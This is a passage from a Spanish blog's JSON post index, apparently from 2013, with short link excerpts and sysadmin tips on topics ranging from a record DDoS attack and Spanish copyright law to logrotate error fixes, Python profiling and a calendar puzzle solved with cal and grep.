| genbeta.com\n","permalink":"http://karpoke.ignaciocano.com/2013/03/29/una-disputa-en-torno-al-spam-genera-el-mayor-ataque-ddos-registrado-en-internet/","summary":"\u003cblockquote\u003e\n\u003cp\u003eVarios medios se han hecho eco del que puede ser, probablemente, el\nmayor ataque de denegación de servicio (DDOS) registrado en la\nhistoria de Internet. Todo parece indicar que tras el ataque está una\ndisputa en torno al SPAM. Una de las víctimas, CloudFlare, sitio\nespecializado en la distribución de contenidos, ha confirmado el\nhecho.\u003c/p\u003e\n\u003cp\u003eEl ataque ha tenido lugar entre el 18 y 19 de este mes, afectando a\nmuchos usuarios de la Red y servicios como Netflix. Para entender\nhasta qué punto el ataque ha sido importante, pensad que un ataque\nDDOS normal puede suponer un tráfico de 10 Gbps, y éste ha llegado a\npicos de 300 Gbps, el más importante que se conoce públicamente.\u003c/p\u003e","title":"Una disputa en torno al spam genera el mayor ataque DDOS registrado en Internet"},{"content":" La obra de Maurits Cornelis Escher está plagada de composiciones sorprendentes en las que todos los elementos se fusionan y de perspectivas imposibles (aunque también produjo otro tipo de litografías). Su influencia fue enorme y ha repercutido en cientos de artistas. Pero también se pueden encontrar muchísimos homenajes a Escher en la cultura popular. Desde el celebérrimo gag del sillón de Los Simpson a los créditos de Donnie Darko, pasando por uno de los puzles más conocidos de God of War, estos son algunos ejemplos de la aparición de los diseños del artista holandés (o inspirados en ellos) en diversos campos.\n» Guillermo del Palacio | alt1040.com\n","permalink":"http://karpoke.ignaciocano.com/2013/03/28/la-obra-de-m-c-escher-en-la-cultura-popular/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa obra de Maurits Cornelis Escher está plagada de composiciones\nsorprendentes en las que todos los elementos se fusionan y de\nperspectivas imposibles (aunque también produjo otro tipo de\nlitografías). Su influencia fue enorme y ha repercutido en cientos de\nartistas. Pero también se pueden encontrar muchísimos homenajes a\nEscher en la cultura popular. Desde el celebérrimo gag del sillón de\nLos Simpson a los créditos de Donnie Darko, pasando por uno de los\npuzles más conocidos de God of War, estos son algunos ejemplos de la\naparición de los diseños del artista holandés (o inspirados en ellos)\nen diversos campos.\u003c/p\u003e","title":"La obra de M. C. Escher en la cultura popular"},{"content":" The HTML5 Web Storage standard was developed to allow sites to store larger amounts of data (like 5-10 MB) than was previously allowed by cookies (like 4KB). localStorage is awesome because it’s supported in all modern browsers (Chrome, Firefox 3.5+, Safari 4+, IE 8+, etc.).\nThe standard anticipated that sites might abuse this feature and advised that browsers limit the total amount of storage space that each origin could use.\n» Feross Aboukhadijeh | feross.org\n","permalink":"http://karpoke.ignaciocano.com/2013/03/27/introducing-the-html5-hard-disk-filler-api/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe HTML5 Web Storage standard was developed to allow sites to store\nlarger amounts of data (like 5-10 MB) than was previously allowed by\ncookies (like 4KB). localStorage is awesome because it’s supported in\nall modern browsers (Chrome, Firefox 3.5+, Safari 4+, IE 8+, etc.).\u003c/p\u003e\n\u003cp\u003eThe standard anticipated that sites might abuse this feature and\nadvised that browsers limit the total amount of storage space that\neach origin could use.\u003c/p\u003e","title":"Introducing the HTML5 Hard Disk Filler„¢ API"},{"content":" Python is distributed with profiling modules. They describe the run time operation of a pure python program, providing a variety of statistics.\nThe cProfile module is the recommended module. To execute your program under the control of the cProfile module, a simple form is:\n$ python -m cProfile -s cumulative mypythonscript.py » Alain Leufroy | logilab.org\n","permalink":"http://karpoke.ignaciocano.com/2013/03/27/run-time-profiling-with-cprofile/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePython is distributed with profiling modules. They describe the run\ntime operation of a pure python program, providing a variety of\nstatistics.\u003c/p\u003e\n\u003cp\u003eThe cProfile module is the recommended module. To execute your program\nunder the control of the cProfile module, a simple form is:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e$ python -m cProfile -s cumulative mypythonscript.py\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Alain Leufroy | \u003ca href=\"http://www.logilab.org/blogentry/104898\"\u003elogilab.org\u003c/a\u003e\u003c/p\u003e","title":"Run time profiling with cProfile"},{"content":" We all know the regular expression character classes, right? There are 12 standard classes:\n[:alnum:] [:digit:] [:punct:] [:alpha:] [:graph:] [:space:] [:blank:] [:lower:] [:upper:] [:cntrl:] [:print:] [:xdigit:] But have you seen a visual representation of what these classes match? Probably not. Therefore I created a visualization that illustrates which part of the ASCII set each character class matches.\n» Peteris Krumins | catonmat.net\n","permalink":"http://karpoke.ignaciocano.com/2013/03/26/visualization-of-regular-expression-character-classes/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWe all know the regular expression character classes, right? There are\n12 standard classes:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e[:alnum:]  [:digit:]  [:punct:]\n[:alpha:]  [:graph:]  [:space:]\n[:blank:]  [:lower:]  [:upper:]\n[:cntrl:]  [:print:]  [:xdigit:]\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eBut have you seen a visual representation of what these classes match?\nProbably not. Therefore I created a visualization that illustrates\nwhich part of the ASCII set each character class matches.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Peteris Krumins | \u003ca href=\"http://www.catonmat.net/blog/regex-char-classes/\"\u003ecatonmat.net\u003c/a\u003e\u003c/p\u003e","title":"Visualization of Regular Expression Character Classes"},{"content":" El hombre artificial siempre fue una fantasía que resulta tan atractiva como inquietante. Como ocurre con las fantasías, tarde o temprano a alguien pensó en llevarla a la práctica. Desde los autómatas de Vaucanson y Jacquet-Droz (tan admirados en el Siglo de las Luces) hasta esos vistosos robots humanoides que la televisión sueles usar para darles color en sus noticieros, aún suelen provocar ciertos temores.\n» Pablo Capanna | pagina12.com.ar\n","permalink":"http://karpoke.ignaciocano.com/2013/03/24/el-codigo-asimov/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl hombre artificial siempre fue una fantasía que resulta tan\natractiva como inquietante. Como ocurre con las fantasías, tarde o\ntemprano a alguien pensó en llevarla a la práctica. Desde los\nautómatas de Vaucanson y Jacquet-Droz (tan admirados en el Siglo de\nlas Luces) hasta esos vistosos robots humanoides que la televisión\nsueles usar para darles color en sus noticieros, aún suelen provocar\nciertos temores.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Pablo Capanna | \u003ca href=\"http://www.pagina12.com.ar/diario/suplementos/futuro/13-2816-2013-03-07.html\"\u003epagina12.com.ar\u003c/a\u003e\u003c/p\u003e","title":"El código Asimov"},{"content":" A short while ago, I discovered that JavaScript allows you to change the href after you click on it. It may not seem that serious at first glance, but rest assured, it can trick customers into giving in their details to fraudsters.\n» bilaw.al\n","permalink":"http://karpoke.ignaciocano.com/2013/03/23/hacking-the-tag-in-100-characters/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA short while ago, I discovered that JavaScript allows you to change\nthe  href after you click on it. It may not seem that serious at\nfirst glance, but rest assured, it can trick customers into giving in\ntheir details to fraudsters.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html\"\u003ebilaw.al\u003c/a\u003e\u003c/p\u003e","title":"Hacking the  tag in 100 characters"},{"content":"Si nos encontramos con el siguiente error:\nerror: error running non-shared postrotate script for /var/log/samba/log.nmbd of \u0026#39;/var/log/samba/log.nmbd \u0026#39; En Ubuntu 12.04.2, con la versión de samba 3.6.3, podría producirse cuando el script de logrotate para samba intenta hacer un reload del servicio nmbd y éste no está en ejecución. Necesita un pequeño cambio en los comandos utilizados en la directiva postrotate: deberemos cambiar reload por reload --quiet, quedando finalmente así las respectivas líneas en el fichero /etc/logrorate.d/samba:\nreload --quiet smbd 2\u0026gt;/dev/null reload --quiet nmbd 2\u0026gt;/dev/null ","permalink":"http://karpoke.ignaciocano.com/2013/03/22/solucionado-el-error-error-error-running-non-shared-postrotate-script-for-varlogsambalog-nmbd-of-varlogsambalog-nmbd/","summary":"\u003cp\u003eSi nos encontramos con el siguiente error:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eerror: error running non-shared postrotate script for /var/log/samba/log.nmbd of \u0026#39;/var/log/samba/log.nmbd \u0026#39;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEn Ubuntu 12.04.2, con la versión de \u003ccode\u003esamba\u003c/code\u003e 3.6.3, podría producirse\ncuando el \u003ca href=\"http://dev-eole.ac-dijon.fr/issues/4524\"\u003e\u003cem\u003escript\u003c/em\u003e de \u003ccode\u003elogrotate\u003c/code\u003e para \u003ccode\u003esamba\u003c/code\u003e\u003c/a\u003e\nintenta hacer un \u003ccode\u003ereload\u003c/code\u003e del servicio \u003ccode\u003enmbd\u003c/code\u003e y éste no está en ejecución.\nNecesita un pequeño cambio en los comandos utilizados en la directiva \u003ccode\u003epostrotate\u003c/code\u003e:\ndeberemos cambiar \u003ccode\u003ereload\u003c/code\u003e por \u003ccode\u003ereload --quiet\u003c/code\u003e, quedando finalmente así\nlas respectivas líneas en el fichero \u003ccode\u003e/etc/logrorate.d/samba\u003c/code\u003e:\u003c/p\u003e","title":"Solucionado el error «error: error running non-shared postrotate script for /var/log/samba/log.nmbd of '/var/log/samba/log.nmbd '»"},{"content":"tiger es una herramienta que comprueba la integridad de ciertos ficheros del sistema.\nEn Ubuntu 12.04.2, la versión instalada es la 3.2.3, y si además estamos usando prelink, puede que tigercron arroje errores del estilo:\nprelink: \u0026#34;/usr/share/vim/vim73/doc/help.txt\u0026#34; is not an ELF file El problema parece estar en un uso incorrecto de prelink, ya que no maneja bien la salida de md5sum. Este error creo que todavía no está solucionado, pero en este hilo se incluye un parche que parece que funciona.\nDescargamos el parche y lo aplicamos, guardando una copia del fichero modificado:\n$ wget -O tiger.patch \u0026#34;http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=5;filename=tiger.patch;att=1;bug=505906\u0026#34; $ sudo patch -b /usr/lib/tiger/systems/Linux/2/deb_checkmd5sums \u0026lt; tiger.patch patching file /usr/lib/tiger/systems/Linux/2/deb_checkmd5sums Una vez actualizado, recibiremos un aviso del propio tiger diciendo que el fichero ha sido modificado:\nNEW: --FAIL-- [lin005f] Installed file `/usr/lib/tiger/systems/Linux/2/deb_checkmd5sums\u0026#39; checksum differs from installed package \u0026#39;tiger\u0026#39;. ","permalink":"http://karpoke.ignaciocano.com/2013/03/21/solucionado-el-error-prelink-is-not-an-elf-file/","summary":"\u003cp\u003e\u003ccode\u003etiger\u003c/code\u003e es una herramienta que comprueba la integridad de ciertos\nficheros del sistema.\u003c/p\u003e\n\u003cp\u003eEn Ubuntu 12.04.2, la versión instalada es la 3.2.3, y si además estamos\nusando \u003ccode\u003eprelink\u003c/code\u003e, puede que \u003ccode\u003etigercron\u003c/code\u003e arroje errores del estilo:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eprelink: \u0026#34;/usr/share/vim/vim73/doc/help.txt\u0026#34; is not an ELF file\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEl problema parece estar en un uso incorrecto de \u003ccode\u003eprelink\u003c/code\u003e, ya que no\nmaneja bien la salida de \u003ccode\u003emd5sum\u003c/code\u003e. Este error creo que todavía no está\nsolucionado, pero en \u003ca href=\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=505906\"\u003eeste hilo\u003c/a\u003e se incluye un parche que parece que\nfunciona.\u003c/p\u003e","title":"Solucionado el error «prelink: ... is not an ELF file»"},{"content":" Exigimos la retirada de la Ley Lassalle y la apertura de un diálogo equilibrado, moderado por un mediador neutral, entre las autoridades, ciudadanía en general, artistas, creadores e industria, con el objetivo discutir sobre las auténticas reformas necesarias en la LPI en un diálogo abierto y honesto.\nNo podemos aceptar una reforma en la que la copia privada se convierte de facto en una mera copia personal en una clara desconexión con la realidad y una involución legislativa que no se podía ni concebir ni a finales del siglo pasado y que actúa directamente contra los intereses de creadores y artistas que ven en la copia privada una actividad que les beneficia y sin la cual, muchos no hubieran llegado a ser tales.\n» Stéphane M. Grueso | steph.es\n","permalink":"http://karpoke.ignaciocano.com/2013/03/21/exigimos-la-retirada-de-la-ley-lassalle-nueva-reforma-de-la-ley-de-propiedad-intelectual/","summary":"\u003cblockquote\u003e\n\u003cp\u003eExigimos la retirada de la Ley Lassalle y la apertura de un diálogo\nequilibrado, moderado por un mediador neutral, entre las autoridades,\nciudadanía en general, artistas, creadores e industria, con el\nobjetivo discutir sobre las auténticas reformas necesarias en la LPI\nen un diálogo abierto y honesto.\u003c/p\u003e\n\u003cp\u003eNo podemos aceptar una reforma en la que la copia privada se convierte\nde facto en una mera copia personal en una clara desconexión con la\nrealidad y una involución legislativa que no se podía ni concebir ni a\nfinales del siglo pasado y que actúa directamente contra los intereses\nde creadores y artistas que ven en la copia privada una actividad que\nles beneficia y sin la cual, muchos no hubieran llegado a ser tales.\u003c/p\u003e","title":"Exigimos la retirada de la Ley Lassalle (nueva reforma de la Ley de Propiedad Intelectual)"},{"content":" El Gobierno de Mariano Rajoy planea la creación de un canon digital que se aplicaría a las universidades por los fragmentos de obras sometidas a derechos de autor que distribuyen a través de Internet en sus campus virtuales.\nSegún la Conferencia de Rectores de Universidades Españolas (Crue) y los expertos en derechos de autor y propiedad intelectual, este canon sería ilegal. Para la sociedad de derechos de autor que gestiona los intereses de las editoriales y los autores de textos, Cedro, es una necesidad. ”Si se paga por las fotocopias, cómo no se va a pagar por las copias digitales”, aduce.\n» Ángel Calleja | 20minutos.es\n","permalink":"http://karpoke.ignaciocano.com/2013/03/20/las-claves-del-nuevo-canon-digital-a-las-universidades-a-quien-afecta-y-a-quien-beneficia/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl Gobierno de Mariano Rajoy planea la creación de un canon digital\nque se aplicaría a las universidades por los fragmentos de obras\nsometidas a derechos de autor que distribuyen a través de Internet en\nsus campus virtuales.\u003c/p\u003e\n\u003cp\u003eSegún la Conferencia de Rectores de Universidades Españolas (Crue) y\nlos expertos en derechos de autor y propiedad intelectual, este canon\nsería ilegal. Para la sociedad de derechos de autor que gestiona los\nintereses de las editoriales y los autores de textos, Cedro, es una\nnecesidad. ”Si se paga por las fotocopias, cómo no se va a pagar por\nlas copias digitales”, aduce.\u003c/p\u003e","title":"Las claves del nuevo canon digital a las universidades: ¿a quién afecta y a quién beneficia?"},{"content":"nagiosgrapher es un programa que recoge la información de Nagios y crea una serie de gráficos a partir de ella.\nEn Ubuntu 12.04.2, la versión instalada desde los repositorios, 1.7.1-3, tiene un pequeño fallo, de tal manera que logrotate arroja el siguiente error:\nerror: nagiosgrapher:1 duplicate log entry for /var/log/nagiosgrapher/ngraph.log error: found error in /var/log/nagiosgrapher/ngraph.log , skipping El fallo está corregido a partir de la versión 1.7.2.\nPodemos confirmar el fallo si vemos que nagiosgrapher instala dos archivos como los siguientes en el directorio de logrotate:\n$ dpkg -L nagiosgrapher | grep logrotate /etc/logrotate.d /etc/logrotate.d/nagiosgrapher /etc/logrotate.d/nagios_grapher $ ls /etc/logrotate.d | grep nagios nagiosgrapher nagios_grapher Uno de ellos, nagios_grapher, hace referencia a un archivo que no existe, /usr/bin/nagios_grapher. Basta con eliminar, o mover a un directorio de backup, este archivo para que ya nos avise del error.\n","permalink":"http://karpoke.ignaciocano.com/2013/03/20/solucionado-el-error-error-nagiosgrapher1-duplicate-log-entry-for-varlognagiosgrapherngraph-log/","summary":"\u003cp\u003e\u003ccode\u003enagiosgrapher\u003c/code\u003e es un programa que recoge la información de Nagios y\ncrea una serie de gráficos a partir de ella.\u003c/p\u003e\n\u003cp\u003eEn Ubuntu 12.04.2, la versión instalada desde los repositorios, 1.7.1-3,\ntiene un pequeño fallo, de tal manera que\n\u003ca href=\"https://bugs.launchpad.net/ubuntu/+source/nagiosgrapher/+bug/466671\"\u003e\u003ccode\u003elogrotate\u003c/code\u003e arroja el siguiente error\u003c/a\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eerror: nagiosgrapher:1 duplicate log entry for /var/log/nagiosgrapher/ngraph.log\nerror: found error in /var/log/nagiosgrapher/ngraph.log , skipping\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEl fallo está corregido a partir de la versión 1.7.2.\u003c/p\u003e\n\u003cp\u003ePodemos confirmar el fallo si vemos que \u003ccode\u003enagiosgrapher\u003c/code\u003e instala dos\narchivos como los siguientes en el directorio de \u003ccode\u003elogrotate\u003c/code\u003e:\u003c/p\u003e","title":"Solucionado el error «error: nagiosgrapher:1 duplicate log entry for /var/log/nagiosgrapher/ngraph.log»"},{"content":" So I wanted to find out: what exactly is the bug in the program that causes this behavior and also, can it be fixed?\nFirst I looked on the Internet to see if the answer has already been found. Some good starting information is located at http://www.jeffsromhack.com/products/donkeykong_tech.htm. There, Jeff Kulczycki breaks down the math of the kill screen, showing the formula that is used to compute the bonus for each level. The formula says the level times 10, plus 40, gives the number of hundreds in the bonus timer. If the result is too large it is forced back down. The key to this is that the level number is used in the calculation. On level 22 an overflow occurs, leaving the player with just 400 points on the timer because the multiplication and addition yields a number larger than 256.\n» Don Hodges | donhodges.com\n","permalink":"http://karpoke.ignaciocano.com/2013/03/20/how-high-can-you-get/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSo I wanted to find out: what exactly is the bug in the program that\ncauses this behavior and also, can it be fixed?\u003c/p\u003e\n\u003cp\u003eFirst I looked on the Internet to see if the answer has already been\nfound. Some good starting information is located at\n\u003ca href=\"http://www.jeffsromhack.com/products/donkeykong_tech.htm\"\u003ehttp://www.jeffsromhack.com/products/donkeykong_tech.htm\u003c/a\u003e. There, Jeff\nKulczycki breaks down the math of the kill screen, showing the formula\nthat is used to compute the bonus for each level. The formula says the\nlevel times 10, plus 40, gives the number of hundreds in the bonus\ntimer. If the result is too large it is forced back down. The key to\nthis is that the level number is used in the calculation. On level 22\nan overflow occurs, leaving the player with just 400 points on the\ntimer because the multiplication and addition yields a number larger\nthan 256.\u003c/p\u003e","title":"How High Can You Get?"},{"content":" El principio de exclusión de Wolfgang Pauli nos dice que dos electrones en un mismo átomo no pueden tener todos sus números atómicos iguales. ¿Y qué significa eso? Aquí es donde entran los urinarios. En un centro comercial construido en la época dorada del ladrillo, un constructor un poco garrulo decidió poner un solo baño y con unas características especiales: la distancia entre los grupos de urinarios era inmensa, pero le daba la oportunidad de poner anuncios con las innumerables promociones de pisos de lamentable calidad, ridículo tamaño y exorbitante precio que tenía en venta. Así que los clientes no tenían más remedio que pasar por interminables pasillos de promociones fraudulentas para liberarse de su agüita amarilla y, si había suerte, saldrían con una hipoteca de por vida.\n» El zombi de Schrödinger | cuantozombi.com\n","permalink":"http://karpoke.ignaciocano.com/2013/03/20/el-principio-de-exclusion-explicado-con-urinarios/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl principio de exclusión de Wolfgang Pauli nos dice que dos electrones en un\nmismo átomo no pueden tener todos sus números atómicos iguales. ¿Y qué\nsignifica eso? Aquí es donde entran los urinarios. En un centro comercial\nconstruido en la época dorada del ladrillo, un constructor un poco garrulo\ndecidió poner un solo baño y con unas características especiales: la\ndistancia entre los grupos de urinarios era inmensa, pero le daba la\noportunidad de poner anuncios con las innumerables promociones de pisos de\nlamentable calidad, ridículo tamaño y exorbitante precio que tenía en venta.\nAsí que los clientes no tenían más remedio que pasar por interminables\npasillos de promociones fraudulentas para liberarse de su agüita amarilla y,\nsi había suerte, saldrían con una hipoteca de por vida.\u003c/p\u003e","title":"El principio de exclusión explicado con urinarios"},{"content":" Lo que hace la Ley Lasalle es terminar con ese debate en España decantándolo a la opción más favorable a la industria de los contenidos. La Ley define ahora expresamente lo que es ”acceso legal” y lo restringe a las copias que se hagan de un soporte original -por lo que la obra ha de estar adherida a un soporte- y siempre que lo hayas adquirido en propiedad por haberlo comprado, excluyendo así copias de obras originales pero alquiladas e incluso las que se hacen de un original que te presta un amigo. Además se exige que esa copia del original que has comprado la hagas por tus propios medios, si la haces ”con asistencia de terceros”, será ilícita.\n» David Bravo | eldiario.es\n","permalink":"http://karpoke.ignaciocano.com/2013/03/19/propiedad-intelectual-preguntas-frecuentes-sobre-la-ley-lasalle/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLo que hace la Ley Lasalle es terminar con ese debate en España\ndecantándolo a la opción más favorable a la industria de los\ncontenidos. La Ley define ahora expresamente lo que es ”acceso legal”\ny lo restringe a las copias que se hagan de un soporte original -por\nlo que la obra ha de estar adherida a un soporte- y siempre que lo\nhayas adquirido en propiedad por haberlo comprado, excluyendo así\ncopias de obras originales pero alquiladas e incluso las que se hacen\nde un original que te presta un amigo. Además se exige que esa copia\ndel original que has comprado la hagas por tus propios medios, si la\nhaces ”con asistencia de terceros”, será ilícita.\u003c/p\u003e","title":"Propiedad intelectual: Preguntas frecuentes sobre la Ley Lasalle"},{"content":" My review of the 7th installment in the Final Fantasy series.\n» IsanWilshireIII | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2013/03/18/final-fantasy-vii-review-plot-spoilers/","summary":"\u003cblockquote\u003e\n\u003cp\u003eMy review of the 7th installment in the Final Fantasy series.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/veEn0k5u5Ko?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» IsanWilshireIII | \u003ca href=\"https://www.youtube.com/watch?v=veEn0k5u5Ko\"\u003eyoutube.com\u003c/a\u003e\u003c/p\u003e","title":"Final Fantasy VII Review (Plot Spoilers)"},{"content":" See, experience is cheap. All it takes is time. Skill is harder, but really only requires hard work ” a lot of people can get that. But attitude. You either have it, or you don’t. The right sort of person is so passionate about coding, they can’t be stopped from doing it. They typically started before high school ” sometimes before middle school ” and never looked back. They write everything from assembly to jQuery, on PCs to mobile phones, doing hard core computer graphics to high level social networking. They’ve tried everything.\nEverything, that is, but .NET.\n» David Barrett | expensify.com\n","permalink":"http://karpoke.ignaciocano.com/2013/03/17/ceo-friday-why-we-dont-hire-net-programmers/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSee, experience is cheap. All it takes is time. Skill is harder, but\nreally only requires hard work ” a lot of people can get that. But\nattitude. You either have it, or you don’t. The right sort of person\nis so passionate about coding, they can’t be stopped from doing it.\nThey typically started before high school ” sometimes before middle\nschool ” and never looked back. They write everything from assembly to\njQuery, on PCs to mobile phones, doing hard core computer graphics to\nhigh level social networking. They’ve tried everything.\u003c/p\u003e","title":"CEO Friday: Why we don’t hire .NET programmers"},{"content":" La propia Unión Europea reconoce que los abusos más frecuentes son:\nexcluir o limitar los derechos legales del consumidor con respecto al profesional en caso de incumplimiento imponer al consumidor que no cumpla sus obligaciones una indemnización desproporcionadamente alta incluir la adhesión del consumidor a cláusulas de las cuales no ha tenido la oportunidad de tomar conocimiento real antes de la celebración del contrato supresión u obstaculización del ejercicio de acciones judiciales o de recursos. » Ruth Ugalde | lainformacion.com\n","permalink":"http://karpoke.ignaciocano.com/2013/03/16/revisa-tu-contrato-si-contiene-una-de-estas-clausulas-europa-lo-considera-abusivo/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa propia Unión Europea reconoce que los abusos más frecuentes son:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eexcluir o limitar los derechos legales del consumidor con respecto\nal profesional en caso de incumplimiento\u003c/li\u003e\n\u003cli\u003eimponer al consumidor que no cumpla sus obligaciones una\nindemnización desproporcionadamente alta\u003c/li\u003e\n\u003cli\u003eincluir la adhesión del consumidor a cláusulas de las cuales no ha\ntenido la oportunidad de tomar conocimiento real antes de la\ncelebración del contrato\u003c/li\u003e\n\u003cli\u003esupresión u obstaculización del ejercicio de acciones judiciales o\nde recursos.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Ruth Ugalde | \u003ca href=\"http://noticias.lainformacion.com/economia-negocios-y-finanzas/servicios-bancarios/revisa-tu-contrato-si-contiene-una-de-estas-clausulas-europa-lo-considera-abusivo_cW8mODyncLHot7mipeFUC4/\"\u003elainformacion.com\u003c/a\u003e\u003c/p\u003e","title":"Revisa tu contrato: si contiene una de estas cláusulas, Europa lo considera abusivo"},{"content":" No Starch Press and I have decided to release this free ebook version of Hacking the Xbox in honor of Aaron Swartz. As you read this book, I hope that you’ll be reminded of how important freedom is to the hacking community and that you’ll be inclined to support the causes that Aaron believed in.\nI agreed to release this book for free in part because Aaron’s treatment by MIT is not unfamiliar to me. In this book, you will find the story of when I was an MIT graduate student, extracting security keys from the original Microsoft Xbox. You’ll also read about the crushing disappointment of receiving a letter from MIT legal repudiating any association with my work, effectively leaving me on my own to face Microsoft.\n» nostarch.com » bunnie | bunniestudios.com » Hacking the XBox (PDF)\n","permalink":"http://karpoke.ignaciocano.com/2013/03/15/an-open-letter-from-bunnie-author-of-hacking-the-xbox/","summary":"\u003cblockquote\u003e\n\u003cp\u003eNo Starch Press and I have decided to release this free ebook version\nof Hacking the Xbox in honor of Aaron Swartz. As you read this book, I\nhope that you’ll be reminded of how important freedom is to the\nhacking community and that you’ll be inclined to support the causes\nthat Aaron believed in.\u003c/p\u003e\n\u003cp\u003eI agreed to release this book for free in part because Aaron’s\ntreatment by MIT is not unfamiliar to me. In this book, you will find\nthe story of when I was an MIT graduate student, extracting security\nkeys from the original Microsoft Xbox. You’ll also read about the\ncrushing disappointment of receiving a letter from MIT legal\nrepudiating any association with my work, effectively leaving me on my\nown to face Microsoft.\u003c/p\u003e","title":"An open letter from bunnie, author of Hacking the Xbox"},{"content":"Leyendo el espejo lúdico, me encuentro con estas dos preguntas:\n¿Hay algún día de la semana en el que nunca puede empezar un siglo? Por el contrario, ¿cuál es el día de la semana que puede ser inicio y final de un siglo?\nque pueden quedar contestadas rápidamente ejecutando el siguiente comando:\n$ for year in `seq 2001 100 3001`; do cal 1 $year | grep -A2 $year; done | grep --color -B2 \u0026#34; 1 \u0026#34; Enero 2001 do lu ma mi ju vi sá 1 2 3 4 5 6 Enero 2101 do lu ma mi ju vi sá 1 Enero 2201 do lu ma mi ju vi sá 1 2 3 Enero 2301 do lu ma mi ju vi sá 1 2 3 4 5 Enero 2401 do lu ma mi ju vi sá 1 2 3 4 5 6 Enero 2501 do lu ma mi ju vi sá 1 Enero 2601 do lu ma mi ju vi sá 1 2 3 Enero 2701 do lu ma mi ju vi sá 1 2 3 4 5 Enero 2801 do lu ma mi ju vi sá 1 2 3 4 5 6 Enero 2901 do lu ma mi ju vi sá 1 Enero 3001 do lu ma mi ju vi sá 1 2 3 Los años divisibles por 100 no son bisiestos, a no ser que sean divisible por 400:\n$ cal 2 2000 Febrero 2000 do lu ma mi ju vi sá 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 $ cal 2 2100 Febrero 2100 do lu ma mi ju vi sá 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 Por lo que, volviendo a las preguntas, los siglos no pueden comenzar en miércoles, viernes ni domingo. El lunes es él único día que puede ser comienzo y final de siglo. Por ejemplo, en 2001:\n$ cal 1 2001 Enero 2001 do lu ma mi ju vi sá 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 $ cal 12 2001 Diciembre 2001 do lu ma mi ju vi sá 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ","permalink":"http://karpoke.ignaciocano.com/2013/03/14/el-dia-negado/","summary":"\u003cp\u003eLeyendo el \u003ca href=\"http://espejo-ludico.blogspot.com.es/2013/03/el-dia-negado.html\"\u003eespejo lúdico\u003c/a\u003e, me encuentro con estas dos preguntas:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e¿Hay algún día de la semana en el que nunca puede empezar un siglo?\nPor el contrario, ¿cuál es el día de la semana que puede ser inicio y\nfinal de un siglo?\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eque pueden quedar contestadas rápidamente ejecutando el siguiente\ncomando:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ for year in `seq 2001 100 3001`; do cal 1 $year | grep -A2 $year; done | grep --color -B2 \u0026#34; 1 \u0026#34;\n     Enero 2001\ndo lu ma mi ju vi sá\n    1  2  3  4  5  6\n     Enero 2101\ndo lu ma mi ju vi sá\n                   1\n     Enero 2201\ndo lu ma mi ju vi sá\n             1  2  3\n     Enero 2301\ndo lu ma mi ju vi sá\n       1  2  3  4  5\n     Enero 2401\ndo lu ma mi ju vi sá\n    1  2  3  4  5  6\n     Enero 2501\ndo lu ma mi ju vi sá\n                   1\n     Enero 2601\ndo lu ma mi ju vi sá\n             1  2  3\n     Enero 2701\ndo lu ma mi ju vi sá\n       1  2  3  4  5\n     Enero 2801\ndo lu ma mi ju vi sá\n    1  2  3  4  5  6\n     Enero 2901\ndo lu ma mi ju vi sá\n                   1\n     Enero 3001\ndo lu ma mi ju vi sá\n             1  2  3\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eLos años divisibles por 100 no son bisiestos, a no ser que 